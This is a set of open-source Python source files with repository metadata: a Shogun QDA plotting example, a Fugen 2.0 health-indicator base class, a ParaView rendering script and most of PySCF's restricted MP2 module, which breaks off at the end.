pylab.pcolormesh(xx, yy, Z)
pylab.contour(xx, yy, Z, linewidths = 3, colors = 'k')
# Number of classes
M = 3
# Number of samples of each class
N = 300
# Dimension of the data
dim = 2
cols = ['blue', 'green', 'red']
fig = pylab.figure()
ax = fig.add_subplot(111)
pylab.title('Quadratic Discrimant Analysis')
X, y = gen_data()
labels = MulticlassLabels(y)
features = RealFeatures(X.T)
qda = QDA(features, labels, 1e-4, True)
qda.train()
ypred = qda.apply().get_labels()
plot_data(qda, X, y, ypred, ax)
for i in range(M):
plot_cov(ax, qda.get_mean(i), qda.get_cov(i), cols[i])
plot_regions(qda)
pylab.connect('key_press_event', util.quit)
pylab.show()
|
ratschlab/ASP
|
examples/undocumented/python_modular/graphical/multiclass_qda.py
|
Python
|
gpl-2.0
| 3,312
|
[
"Gaussian"
] |
3ecac96f76430dcef869125a8258a925fafc1e15a170825e178f2b0e165a7ef3
|
# coding: utf-8
# Copyright 2017 Solthis.
#
# This file is part of Fugen 2.0.
#
# Fugen 2.0 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Fugen 2.0 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fugen 2.0. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
from data.fuchia_database import FuchiaDatabase
import constants
INDICATORS_REGISTRY = {}
class IndicatorMeta(type):
FUCHIA_DB_INSTANCE = None
INSTANCES = {}
def __call__(cls, *args, **kwargs):
if len(args) == 1 and isinstance(args[0], FuchiaDatabase):
db = args[0]
if db != cls.FUCHIA_DB_INSTANCE:
# Invalidate cache
cls.INSTANCES = {}
cls.FUCHIA_DB_INSTANCE = db
if cls not in cls.INSTANCES:
cls.INSTANCES[cls] = super(
IndicatorMeta,
cls
).__call__(*args, **kwargs)
return cls.INSTANCES[cls]
return super(IndicatorMeta, cls).__call__(*args, **kwargs)
def __init__(cls, *args, **kwargs):
try:
INDICATORS_REGISTRY[cls.get_key()] = {
'class': cls,
}
except NotImplementedError:
pass
return super(IndicatorMeta, cls).__init__(cls)
class BaseIndicator(metaclass=IndicatorMeta):
"""
Abstract base class for an indicator.
"""
def __init__(self, fuchia_database):
self.fuchia_database = fuchia_database
@property
def patients_dataframe(self):
return self.fuchia_database.patients_dataframe
@property
def visits_dataframe(self):
return self.fuchia_database.visits_dataframe
@property
def patient_drugs_dataframe(self):
return self.fuchia_database.patient_drugs_dataframe
@property
def visit_drugs_dataframe(self):
return self.fuchia_database.visit_drugs_dataframe
@classmethod
def get_key(cls):
raise NotImplementedError()
@classmethod
def get_display_label(cls):
return cls.get_key()
def filter_patients_at_date(self, limit_date, start_date=None,
include_null_dates=False):
"""
Filter the patients dataframe to only retain those who entered the
follow up before the limit date. For each patient, also compute the
age at the given limit age and add it in a new column called
'age_at_date'.
:param limit_date: The limit date (included) to filter on.
:param start_date: If given, only return the patients who had a visit
between the start_date and the limit date (both included).
:param include_null_dates: If True, will include the patients with a null
date.
:return: The filtered dataframe.
"""
if pd.isnull(limit_date):
return self.patients_dataframe
visits_filtered = self.filter_visits_at_date(
limit_date,
start_date=start_date,
include_null_dates=include_null_dates
)
c = self.patients_dataframe['id'].isin(visits_filtered['patient_id'])
df = self.patients_dataframe[c]
age_at_date_col = df.apply(
lambda i: get_age_at_date(i, limit_date),
axis=1
)
if len(df) == 0:
return df
return df.assign(age_at_date=age_at_date_col)
def filter_visits_at_date(self, limit_date, start_date=None,
include_null_dates=False):
"""
Filter the visits dataframe to only retain events that happened before
the limit date.
:param limit_date: The limit date (included) to filter on.
:param start_date: If given, only return the visits between the
start_date and the limit date (both included).
:param include_null_dates: If True, will include the event with a null date.
:return: The filtered dataframe.
"""
if pd.isnull(limit_date):
return self.visits_dataframe
date_filter = (self.visits_dataframe['visit_date'] <= limit_date)
if start_date:
date_filter &= (self.visits_dataframe['visit_date'] >= start_date)
if include_null_dates:
null_filter = pd.isnull(self.visits_dataframe['visit_date'])
return self.visits_dataframe[date_filter | null_filter]
return self.visits_dataframe[date_filter]
def filter_patients_by_category(self, limit_date, start_date=None,
gender=None, age_min=None,
age_max=None, age_is_null=False,
include_null_dates=False):
"""
Filter the patients dataframe with a limit date and a category.
A category is a combination of a gender (male, female or both)
constraint and one or two age constraints (min, max, min and max).
Note that the min age constraint is greater or equal (>=)
and the max age constraint is strictly lesser (<).
:param limit_date: The limit date to filter on.
:param start_date: If given, only return the patients who had a visit
between the start_date and the limit date (both included).
:param gender: The gender to filter on. None means both.
None by default.
:param age_min: The minimum age to filter on. None means no minimum.
None by default.
:param age_max: The maximum age to filter on. None means no maximum.
None by default.
:param age_is_null: If true, only return patients with a null value
for the age.
:param include_null_dates: If true, include patients with a null
inclusion date. False by default.
:return: The filtered dataframe.
"""
df = self.filter_patients_at_date(
limit_date,
start_date=start_date,
include_null_dates=include_null_dates
)
# Fake filter - Always true
category_filter = pd.notnull(df['id'])
if gender is not None:
category_filter &= (df['gender'] == gender)
if age_is_null:
return df[category_filter & pd.isnull(df['age_at_date'])]
if age_min is not None:
category_filter &= (df['age_at_date'] >= age_min)
if age_max is not None:
category_filter &= (df['age_at_date'] < age_max)
return df[category_filter]
def filter_visits_by_category(self, limit_date, start_date=None,
gender=None, age_min=None,
age_max=None, age_is_null=False,
include_null_dates=False):
"""
Filter the visits dataframe with a limit date and a category.
A category is a combination of a gender (male, female or both)
constraint and one or two age constraints (min, max, min and max).
Note that the min age constraint is greater or equal (>=)
and the max age constraint is strictly lesser (<).
:param limit_date: The limit date to filter on.
:param start_date: If given, only return the visits between the
start_date and the limit date (both included).
:param gender: The gender to filter on. None means both.
:param age_min: The minimum age to filter on. None means no minimum.
None by default.
:param age_max: The maximum age to filter on. None means no maximum.
None by default.
:param age_is_null: If true, only return patients with a null value
for the age.
:param include_null_dates: If true, include data with a null date.
False by default.
:return: The filtered dataframe.
"""
patients = self.filter_patients_by_category(
limit_date,
start_date=start_date,
include_null_dates=include_null_dates,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null
)
visits = self.filter_visits_at_date(
limit_date,
start_date=start_date,
include_null_dates=include_null_dates
)
df = visits[visits['patient_id'].isin(patients.index)]
return df
def filter_patient_drugs_by_category(self, limit_date, start_date=None,
gender=None, age_min=None,
age_max=None, age_is_null=False,
include_null_dates=False):
patients = self.filter_patients_by_category(
limit_date,
start_date=start_date,
include_null_dates=include_null_dates,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null
)
df = self.patient_drugs_dataframe
df = df[df['beginning'] <= limit_date]
return df[df['patient_id'].isin(patients['id'])]
def filter_visit_drugs_by_category(self, limit_date, start_date=None,
gender=None, age_min=None,
age_max=None, age_is_null=False,
include_null_dates=False):
visits = self.filter_visits_by_category(
limit_date,
start_date=start_date,
include_null_dates=include_null_dates,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null
)
df = self.visit_drugs_dataframe
return df[df['visit_id'].isin(visits['id'])]
def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
age_max=None, age_is_null=False, include_null_dates=False):
raise NotImplementedError()
def __neg__(self):
return NegIndicator(self)
def __add__(self, other):
return AdditionIndicator(self, other)
def __sub__(self, other):
return SubtractionIndicator(self, other)
def __mul__(self, other):
return MultiplicationIndicator(self, other)
def __truediv__(self, other):
return TrueDivisionIndicator(self, other)
class NegIndicator(BaseIndicator):
def __init__(self, indicator):
super(NegIndicator, self).__init__(indicator.fuchia_database)
self.indicator = indicator
@classmethod
def get_key(cls):
raise NotImplementedError()
def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
age_max=None, age_is_null=False, include_null_dates=False,
post_filter_index=None):
return -1 * (self.indicator.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
))
class AdditionIndicator(BaseIndicator):
def __init__(self, indicator_a, indicator_b):
super(AdditionIndicator, self).__init__(indicator_a.fuchia_database)
self.indicator_a = indicator_a
self.indicator_b = indicator_b
@classmethod
def get_key(cls):
raise NotImplementedError()
def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
age_max=None, age_is_null=False, include_null_dates=False,
post_filter_index=None):
a = self.indicator_a.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
b = self.indicator_b.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
return a + b
class SubtractionIndicator(BaseIndicator):
def __init__(self, indicator_a, indicator_b):
super(SubtractionIndicator, self).__init__(indicator_a.fuchia_database)
self.indicator_a = indicator_a
self.indicator_b = indicator_b
@classmethod
def get_key(cls):
raise NotImplementedError()
def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
age_max=None, age_is_null=False, include_null_dates=False,
post_filter_index=None):
a = self.indicator_a.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
b = self.indicator_b.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
return a - b
class MultiplicationIndicator(BaseIndicator):
def __init__(self, indicator_a, indicator_b):
super(MultiplicationIndicator, self).__init__(indicator_a.fuchia_database)
self.indicator_a = indicator_a
self.indicator_b = indicator_b
@classmethod
def get_key(cls):
raise NotImplementedError()
def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
age_max=None, age_is_null=False, include_null_dates=False,
post_filter_index=None):
a = self.indicator_a.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
b = self.indicator_b.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
return a * b
class TrueDivisionIndicator(BaseIndicator):
def __init__(self, indicator_a, indicator_b):
super(TrueDivisionIndicator, self).__init__(indicator_a.fuchia_database)
self.indicator_a = indicator_a
self.indicator_b = indicator_b
@classmethod
def get_key(cls):
raise NotImplementedError()
def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
age_max=None, age_is_null=False, include_null_dates=False,
post_filter_index=None):
a = self.indicator_a.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
b = self.indicator_b.get_value(
limit_date,
start_date=start_date,
gender=gender,
age_min=age_min,
age_max=age_max,
age_is_null=age_is_null,
include_null_dates=include_null_dates,
post_filter_index=post_filter_index
)
if b == 0:
return None
return a / b
def get_age_at_date(patient_record, limit_date):
birth_date = patient_record['birth_date']
age_in_days = None
if not pd.isnull(birth_date):
age_in_days = (limit_date.date() - birth_date.date()).days
else:
age = patient_record['age']
age_unit = patient_record['age_unit']
age_date = patient_record['age_date']
if pd.isnull(age_date) or pd.isnull(age):
return None
delta_in_days = 0
if pd.notnull(age_date):
delta_in_days = (limit_date.date() - age_date.date()).days
if age is not None and age_date is not None and age_unit is not None:
if age_unit == constants.MONTH_UNIT:
age_in_days = age * 30
elif age_unit == constants.YEAR_UNIT:
age_in_days = age * 365
elif age_unit == constants.DAY_UNIT:
age_in_days = age
age_in_days += delta_in_days
return age_in_days // 365
|
Solthis/Fugen-2.0
|
data/indicators/base_indicator.py
|
Python
|
gpl-3.0
| 17,399
|
[
"VisIt"
] |
651c897018a1e0d2eccfa93b548e52a2ac323659faba5f1945bde8d184479b59
|
#!/usr/bin/pvpython
# Script taken from paraview's "python trace", with slighly renaming and deleting unnecessary code
# To be run by pvpython or Paraview, not Yade (!)
# In paraview: Tools -> Python shell, then click Run Script and choose this file
# should correspond to the values in export_text.py
from __future__ import print_function
center = (5,5,5)
normal = (1,1,1)
maxRadius = 1.5
from paraview.simple import *
view = GetActiveViewOrCreate('RenderView')
testvtk = LegacyVTKReader(FileNames=['/tmp/test.vtk'],guiName="test.vtk")
glyph1 = Glyph(Input=testvtk, GlyphType='Sphere', Scalars=['POINTS','radius'])
glyph1.GlyphType.Radius = 1.0
glyph1.GlyphType.ThetaResolution = 16
glyph1.GlyphType.PhiResolution = 16
glyph1.ScaleMode = 'scalar'
glyph1.ScaleFactor = 1.0
glyph1.GlyphMode = 'All Points'
clip = Clip(Input=glyph1)
clip.ClipType.Origin = center
clip.ClipType.Normal = normal
testSectionvtk = LegacyVTKReader(FileNames=['/tmp/testSection.vtk'], guiName="testSection.vtk" )
sections = Glyph(Input=testSectionvtk, GlyphType='Cylinder', Vectors=['POINTS','normal'], Scalars=['POINTS','radius'])
sections.GlyphType.Height = 0.01
sections.GlyphType.Radius = 1.0
sections.GlyphType.Resolution = 16
sections.GlyphTransform.Rotate = [0.0, 0.0, -90.0]
sections.ScaleMode = 'scalar'
sections.ScaleFactor = 1.0
sections.GlyphMode = 'All Points'
clipDisplay = Show(clip, view)
ColorBy(clipDisplay, ('POINTS', 'radius'))
radiusLUT = GetColorTransferFunction('radius')
radiusLUT.RescaleTransferFunction(0.0, maxRadius)
# either this:
# HideScalarBarIfNotNeeded(radiusLUT, view)
# or this command:
# clipDisplay.SetScalarBarVisibility(view, False)
# depending on paraview version. Can we chack paraview version inside script? Maybe https://public.kitware.com/pipermail/paraview/2014-May/031180.html
sectionsDisplay = Show(sections, view)
ColorBy(sectionsDisplay, ('POINTS', 'radiusOrig'))
radiusOrigLUT = GetColorTransferFunction('radiusOrig')
radiusOrigLUT.RescaleTransferFunction(0.0, maxRadius)
# either this:
# HideScalarBarIfNotNeeded(radiusOrigLUT, view)
# or this command:
# sectionsDisplay.SetScalarBarVisibility(view, False)
# depending on paraview version. Can we chack paraview version inside script? Maybe https://public.kitware.com/pipermail/paraview/2014-May/031180.html
SetActiveSource(sections)
view.ResetCamera()
view.OrientationAxesVisibility = False
view.Background = [1.0, 1.0, 1.0]
view.ViewSize = [600,600]
view.CameraFocalPoint = center
view.CameraPosition = [-10,12,-16]
view.CameraViewUp = [1,0,0]
view.CameraParallelScale = 0
RenderAllViews()
out = "/tmp/test.png"
SaveScreenshot(out)
print("Screenshot saved to {}".format(out))
|
cosurgi/trunk
|
examples/test/paraview-spheres-solid-section/pv_section.py
|
Python
|
gpl-2.0
| 2,679
|
[
"ParaView",
"VTK"
] |
5147e5d4c299eecc9b128d712b6588ddef70e29dcec506c43e7d29a37567b86e
|
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
RMP2
'''
import time
from functools import reduce
import copy
import numpy
from pyscf import gto
from pyscf import lib
from pyscf.lib import logger
from pyscf import ao2mo
from pyscf.ao2mo import _ao2mo
from pyscf import __config__
WITH_T2 = getattr(__config__, 'mp_mp2_with_t2', True)
def kernel(mp, mo_energy=None, mo_coeff=None, eris=None, with_t2=WITH_T2, verbose=None):
if mo_energy is not None or mo_coeff is not None:
# For backward compatibility. In pyscf-1.4 or earlier, mp.frozen is
# not supported when mo_energy or mo_coeff is given.
assert(mp.frozen == 0 or mp.frozen is None)
if eris is None:
eris = mp.ao2mo(mo_coeff)
if mo_energy is None:
mo_energy = eris.mo_energy
nocc = mp.nocc
nvir = mp.nmo - nocc
eia = mo_energy[:nocc,None] - mo_energy[None,nocc:]
if with_t2:
t2 = numpy.empty((nocc,nocc,nvir,nvir), dtype=eris.ovov.dtype)
else:
t2 = None
emp2 = 0
for i in range(nocc):
if isinstance(eris.ovov, numpy.ndarray) and eris.ovov.ndim == 4:
# When mf._eri is a custom integrals wiht the shape (n,n,n,n), the
# ovov integrals might be in a 4-index tensor.
gi = eris.ovov[i]
else:
gi = numpy.asarray(eris.ovov[i*nvir:(i+1)*nvir])
gi = gi.reshape(nvir,nocc,nvir).transpose(1,0,2)
t2i = gi.conj()/lib.direct_sum('jb+a->jba', eia, eia[i])
emp2 += numpy.einsum('jab,jab', t2i, gi) * 2
emp2 -= numpy.einsum('jab,jba', t2i, gi)
if with_t2:
t2[i] = t2i
return emp2.real, t2
# Iteratively solve MP2 if non-canonical HF is provided
def _iterative_kernel(mp, eris, verbose=None):
cput1 = cput0 = (time.clock(), time.time())
log = logger.new_logger(mp, verbose)
emp2, t2 = mp.init_amps(eris=eris)
log.info('Init E(MP2) = %.15g', emp2)
adiis = lib.diis.DIIS(mp)
conv = False
for istep in range(mp.max_cycle):
t2new = mp.update_amps(t2, eris)
if isinstance(t2new, numpy.ndarray):
normt = numpy.linalg.norm(t2new - t2)
t2 = None
t2new = adiis.update(t2new)
else: # UMP2
normt = numpy.linalg.norm([numpy.linalg.norm(t2new[i] - t2[i])
for i in range(3)])
t2 = None
t2shape = [x.shape for x in t2new]
t2new = numpy.hstack([x.ravel() for x in t2new])
t2new = adiis.update(t2new)
t2new = lib.split_reshape(t2new, t2shape)
t2, t2new = t2new, None
emp2, e_last = mp.energy(t2, eris), emp2
log.info('cycle = %d E_corr(MP2) = %.15g dE = %.9g norm(t2) = %.6g',
istep+1, emp2, emp2 - e_last, normt)
cput1 = log.timer('MP2 iter', *cput1)
if abs(emp2-e_last) < mp.conv_tol and normt < mp.conv_tol_normt:
conv = True
break
log.timer('MP2', *cput0)
return conv, emp2, t2
def energy(mp, t2, eris):
'''MP2 energy'''
nocc, nvir = t2.shape[1:3]
eris_ovov = numpy.asarray(eris.ovov).reshape(nocc,nvir,nocc,nvir)
emp2 = numpy.einsum('ijab,iajb', t2, eris_ovov) * 2
emp2 -= numpy.einsum('ijab,ibja', t2, eris_ovov)
return emp2.real
def update_amps(mp, t2, eris):
'''Update non-canonical MP2 amplitudes'''
#assert(isinstance(eris, _ChemistsERIs))
nocc, nvir = t2.shape[1:3]
fock = eris.fock
mo_e_o = eris.mo_energy[:nocc]
mo_e_v = eris.mo_energy[nocc:] + mp.level_shift
foo = fock[:nocc,:nocc] - numpy.diag(mo_e_o)
fvv = fock[nocc:,nocc:] - numpy.diag(mo_e_v)
t2new = lib.einsum('ijac,bc->ijab', t2, fvv)
t2new -= lib.einsum('ki,kjab->ijab', foo, t2)
t2new = t2new + t2new.transpose(1,0,3,2)
eris_ovov = numpy.asarray(eris.ovov).reshape(nocc,nvir,nocc,nvir)
t2new += eris_ovov.conj().transpose(0,2,1,3)
eris_ovov = None
eia = mo_e_o[:,None] - mo_e_v
t2new /= lib.direct_sum('ia,jb->ijab', eia, eia)
return t2new
def make_rdm1(mp, t2=None, eris=None, ao_repr=False):
'''Spin-traced one-particle density matrix.
The occupied-virtual orbital response is not included.
dm1[p,q] = <q_alpha^\dagger p_alpha> + <q_beta^\dagger p_beta>
The convention of 1-pdm is based on McWeeney's book, Eq (5.4.20).
The contraction between 1-particle Hamiltonian and rdm1 is
E = einsum('pq,qp', h1, rdm1)
Kwargs:
ao_repr : boolean
Whether to transfrom 1-particle density matrix to AO
representation.
'''
from pyscf.cc import ccsd_rdm
doo, dvv = _gamma1_intermediates(mp, t2, eris)
nocc = doo.shape[0]
nvir = dvv.shape[0]
dov = numpy.zeros((nocc,nvir), dtype=doo.dtype)
dvo = dov.T
return ccsd_rdm._make_rdm1(mp, (doo, dov, dvo, dvv), with_frozen=True,
ao_repr=ao_repr)
def _gamma1_intermediates(mp, t2=None, eris=None):
if t2 is None: t2 = mp.t2
nmo = mp.nmo
nocc = mp.nocc
nvir = nmo - nocc
if t2 is None:
if eris is None:
eris = mp.ao2mo()
mo_energy = eris.mo_energy
eia = mo_energy[:nocc,None] - mo_energy[None,nocc:]
dtype = eris.ovov.dtype
else:
dtype = t2.dtype
dm1occ = numpy.zeros((nocc,nocc), dtype=dtype)
dm1vir = numpy.zeros((nvir,nvir), dtype=dtype)
for i in range(nocc):
if t2 is None:
gi = numpy.asarray(eris.ovov[i*nvir:(i+1)*nvir])
gi = gi.reshape(nvir,nocc,nvir).transpose(1,0,2)
t2i = gi.conj()/lib.direct_sum('jb+a->jba', eia, eia[i])
else:
t2i = t2[i]
l2i = t2i.conj()
dm1vir += numpy.einsum('jca,jcb->ba', l2i, t2i) * 2 \
- numpy.einsum('jca,jbc->ba', l2i, t2i)
dm1occ += numpy.einsum('iab,jab->ij', l2i, t2i) * 2 \
- numpy.einsum('iab,jba->ij', l2i, t2i)
return -dm1occ, dm1vir
def make_rdm2(mp, t2=None, eris=None, ao_repr=False):
r'''
Spin-traced two-particle density matrix in MO basis
dm2[p,q,r,s] = \sum_{sigma,tau} <p_sigma^\dagger r_tau^\dagger s_tau q_sigma>
Note the contraction between ERIs (in Chemist's notation) and rdm2 is
E = einsum('pqrs,pqrs', eri, rdm2)
'''
if t2 is None: t2 = mp.t2
nmo = nmo0 = mp.nmo
nocc = nocc0 = mp.nocc
nvir = nmo - nocc
if t2 is None:
if eris is None:
eris = mp.ao2mo()
mo_energy = eris.mo_energy
eia = mo_energy[:nocc,None] - mo_energy[None,nocc:]
if mp.frozen is not None:
nmo0 = mp.mo_occ.size
nocc0 = numpy.count_nonzero(mp.mo_occ > 0)
moidx = get_frozen_mask(mp)
oidx = numpy.where(moidx & (mp.mo_occ > 0))[0]
vidx = numpy.where(moidx & (mp.mo_occ ==0))[0]
else:
moidx = oidx = vidx = None
dm1 = make_rdm1(mp, t2, eris)
dm1[numpy.diag_indices(nocc0)] -= 2
dm2 = numpy.zeros((nmo0,nmo0,nmo0,nmo0), dtype=dm1.dtype) # Chemist notation
#dm2[:nocc,nocc:,:nocc,nocc:] = t2.transpose(0,3,1,2)*2 - t2.transpose(0,2,1,3)
#dm2[nocc:,:nocc,nocc:,:nocc] = t2.transpose(3,0,2,1)*2 - t2.transpose(2,0,3,1)
for i in range(nocc):
if t2 is None:
gi = numpy.asarray(eris.ovov[i*nvir:(i+1)*nvir])
gi = gi.reshape(nvir,nocc,nvir).transpose(1,0,2)
t2i = gi.conj()/lib.direct_sum('jb+a->jba', eia, eia[i])
else:
t2i = t2[i]
# dm2 was computed as dm2[p,q,r,s] = < p^\dagger r^\dagger s q > in the
# above. Transposing it so that it be contracted with ERIs (in Chemist's
# notation):
# E = einsum('pqrs,pqrs', eri, rdm2)
dovov = t2i.transpose(1,0,2)*2 - t2i.transpose(2,0,1)
dovov *= 2
if moidx is None:
dm2[i,nocc:,:nocc,nocc:] = dovov
dm2[nocc:,i,nocc:,:nocc] = dovov.conj().transpose(0,2,1)
else:
dm2[oidx[i],vidx[:,None,None],oidx[:,None],vidx] = dovov
dm2[vidx[:,None,None],oidx[i],vidx[:,None],oidx] = dovov.conj().transpose(0,2,1)
# Be careful with convention of dm1 and dm2
# dm1[q,p] = <p^\dagger q>
# dm2[p,q,r,s] = < p^\dagger r^\dagger s q >
# E = einsum('pq,qp', h1, dm1) + .5 * einsum('pqrs,pqrs', eri, dm2)
# When adding dm1 contribution, dm1 subscripts need to be flipped
for i in range(nocc0):
dm2[i,i,:,:] += dm1.T * 2
dm2[:,:,i,i] += dm1.T * 2
dm2[:,i,i,:] -= dm1.T
dm2[i,:,:,i] -= dm1
for i in range(nocc0):
for j in range(nocc0):
dm2[i,i,j,j] += 4
dm2[i,j,j,i] -= 2
if ao_repr:
from pyscf.cc import ccsd_rdm
dm2 = ccsd_rdm._rdm2_mo2ao(dm2, mp.mo_coeff)
return dm2
def get_nocc(mp):
if mp._nocc is not None:
return mp._nocc
elif mp.frozen is None:
nocc = numpy.count_nonzero(mp.mo_occ > 0)
assert(nocc > 0)
return nocc
elif isinstance(mp.frozen, (int, numpy.integer)):
nocc = numpy.count_nonzero(mp.mo_occ > 0) - mp.frozen
assert(nocc > 0)
return nocc
elif isinstance(mp.frozen[0], (int, numpy.integer)):
occ_idx = mp.mo_occ > 0
occ_idx[list(mp.frozen)] = False
nocc = numpy.count_nonzero(occ_idx)
assert(nocc > 0)
return nocc
else:
raise NotImplementedError
def get_nmo(mp):
if mp._nmo is not None:
return mp._nmo
elif mp.frozen is None:
return len(mp.mo_occ)
elif isinstance(mp.frozen, (int, numpy.integer)):
return len(mp.mo_occ) - mp.frozen
elif isinstance(mp.frozen[0], (int, numpy.integer)):
return len(mp.mo_occ) - len(set(mp.frozen))
else:
raise NotImplementedError
def get_frozen_mask(mp):
'''Get boolean mask for the restricted reference orbitals.
In the returned boolean (mask) array of frozen orbital indices, the
element is False if it corresonds to the frozen orbital.
'''
moidx = numpy.ones(mp.mo_occ.size, dtype=numpy.bool)
if mp._nmo is not None:
moidx[mp._nmo:] = False
elif mp.frozen is None:
pass
elif isinstance(mp.frozen, (int, numpy.integer)):
moidx[:mp.frozen] = False
elif len(mp.frozen) > 0:
moidx[list(mp.frozen)] = False
else:
raise NotImplementedError
return moidx
def as_scanner(mp):
'''Generating a scanner/solver for MP2 PES.
The returned solver is a function. This function requires one argument
"mol" as input and returns total MP2 energy.
The solver will automatically use the results of last calculation as the
initial guess of the new calculation. All parameters assigned in the
MP2 and the underlying SCF objects (conv_tol, max_memory etc) are
automatically applied in the solver.
Note scanner has side effects. It may change many underlying objects
(_scf, with_df, with_x2c, ...) during calculation.
Examples::
>>> from pyscf import gto, scf, mp
>>> mol = gto.M(atom='H 0 0 0; F 0 0 1')
>>> mp2_scanner = mp.MP2(scf.RHF(mol)).as_scanner()
>>> e_tot = mp2_scanner(gto.M(atom='H 0 0 0; F 0 0 1.1'))
>>> e_tot = mp2_scanner(gto.M(atom='H 0 0 0; F 0 0 1.5'))
'''
if isinstance(mp, lib.SinglePointScanner):
return mp
logger.info(mp, 'Set %s as a scanner', mp.__class__)
class MP2_Scanner(mp.__class__, lib.SinglePointScanner):
def __init__(self, mp):
self.__dict__.update(mp.__dict__)
self._scf = mp._scf.as_scanner()
def __call__(self, mol_or_geom, **kwargs):
if isinstance(mol_or_geom, gto.Mole):
mol = mol_or_geom
else:
mol = self.mol.set_geom_(mol_or_geom, inplace=False)
self.reset(mol)
mf_scanner = self._scf
mf_scanner(mol)
self.mo_coeff = mf_scanner.mo_coeff
self.mo_occ = mf_scanner.mo_occ
self.kernel(**kwargs)
return self.e_tot
return MP2_Scanner(mp)
class MP2(lib.StreamObject):
'''restricted MP2 with canonical HF and non-canonical HF reference
Attributes:
verbose : int
Print level. Default value equals to :class:`Mole.verbose`
max_memory : float or int
Allowed memory in MB. Default value equals to :class:`Mole.max_memory`
conv_tol : float
For non-canonical MP2, converge threshold for MP2
correlation energy. Default value is 1e-7.
conv_tol_normt : float
For non-canonical MP2, converge threshold for
norm(t2). Default value is 1e-5.
max_cycle : int
For non-canonical MP2, max number of MP2
iterations. Default value is 50.
diis_space : int
For non-canonical MP2, DIIS space size in MP2
iterations. Default is 6.
level_shift : float
A shift on virtual orbital energies to stablize the MP2 iterations.
frozen : int or list
If integer is given, the inner-most orbitals are excluded from MP2
amplitudes. Given the orbital indices (0-based) in a list, both
occupied and virtual orbitals can be frozen in MP2 calculation.
>>> mol = gto.M(atom = 'H 0 0 0; F 0 0 1.1', basis = 'ccpvdz')
>>> mf = scf.RHF(mol).run()
>>> # freeze 2 core orbitals
>>> pt = mp.MP2(mf).set(frozen = 2).run()
>>> # freeze 2 core orbitals and 3 high lying unoccupied orbitals
>>> pt.set(frozen = [0,1,16,17,18]).run()
Saved results
e_corr : float
MP2 correlation correction
e_tot : float
Total MP2 energy (HF + correlation)
t2 :
T amplitudes t2[i,j,a,b] (i,j in occ, a,b in virt)
'''
# Use CCSD default settings for the moment
max_cycle = getattr(__config__, 'cc_ccsd_CCSD_max_cycle', 50)
conv_tol = getattr(__config__, 'cc_ccsd_CCSD_conv_tol', 1e-7)
conv_tol_normt = getattr(__config__, 'cc_ccsd_CCSD_conv_tol_normt', 1e-5)
def __init__(self, mf, frozen=None, mo_coeff=None, mo_occ=None):
if mo_coeff is None: mo_coeff = mf.mo_coeff
if mo_occ is None: mo_occ = mf.mo_occ
self.mol = mf.mol
self._scf = mf
self.verbose = self.mol.verbose
self.stdout = self.mol.stdout
self.max_memory = mf.max_memory
self.frozen = frozen
# For iterative MP2
self.level_shift = 0
##################################################
# don't modify the following attributes, they are not input options
self.mo_coeff = mo_coeff
self.mo_occ = mo_occ
self._nocc = None
self._nmo = None
self.e_corr = None
self.e_hf = None
self.t2 = None
self._keys = set(self.__dict__.keys())
@property
def nocc(self):
return self.get_nocc()
@nocc.setter
def nocc(self, n):
self._nocc = n
@property
def nmo(self):
return self.get_nmo()
@nmo.setter
def nmo(self, n):
self._nmo = n
def reset(self, mol=None):
if mol is not None:
self.mol = mol
self._scf.reset(mol)
return self
get_nocc = get_nocc
get_nmo = get_nmo
get_frozen_mask = get_frozen_mask
def dump_flags(self, verbose=None):
log = logger.new_logger(self, verbose)
log.info('')
log.info('******** %s ********', self.__class__)
log.info('nocc = %s, nmo = %s', self.nocc, self.nmo)
if self.frozen is not None:
log.info('frozen orbitals %s', self.frozen)
log.info('max_memory %d MB (current use %d MB)',
self.max_memory, lib.current_memory()[0])
return self
@property
